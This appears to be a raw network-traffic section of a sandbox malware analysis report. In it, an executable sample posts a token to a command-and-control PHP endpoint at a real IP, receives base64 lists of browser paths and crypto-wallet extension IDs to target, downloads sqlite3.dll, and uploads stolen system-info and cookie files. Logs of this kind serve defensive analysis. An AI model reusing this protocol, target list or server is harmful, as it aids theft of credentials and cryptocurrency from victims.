                                                                                                                                                                                                                                                        Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.723083973 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                        Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.724787951 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"plugins------HJDBFBKKJDHJKECBGDAK--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186244965 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:10 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Length: 7116
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186327934 CET124INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                        Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186415911 CET1236INData Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32
                                                                                                                                                                                                                                                        Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186494112 CET1236INData Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46
                                                                                                                                                                                                                                                        Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186508894 CET248INData Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d
                                                                                                                                                                                                                                                        Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186527014 CET1236INData Raw: 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47
                                                                                                                                                                                                                                                        Data Ascii: ciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHB
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186568022 CET1236INData Raw: 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57
                                                                                                                                                                                                                                                        Data Ascii: aGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.194926977 CET792INData Raw: 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57
                                                                                                                                                                                                                                                        Data Ascii: bGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.197760105 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="message"fplugins------CGIDAAAKJJDBGCBFCBGI--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.772907019 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:11 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.868886948 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFI
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 5751
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.868947983 CET5751OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36
                                                                                                                                                                                                                                                        Data Ascii: ------BAFCFHDHIIIECBGCAKFIContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------BAFCFHDHIIIECBGCAKFIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:12.903728962 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:12 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.193300962 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.653917074 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:13 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                        ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Length: 1106998
                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.653939009 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: #N@B/81s:<R@B/92P @B


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.549728185.215.113.206805480C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:22.925599098 CET629OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JKEHIIJJECFHJKECFHDG--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.827986956 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:24 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:25.039611101 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDB
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
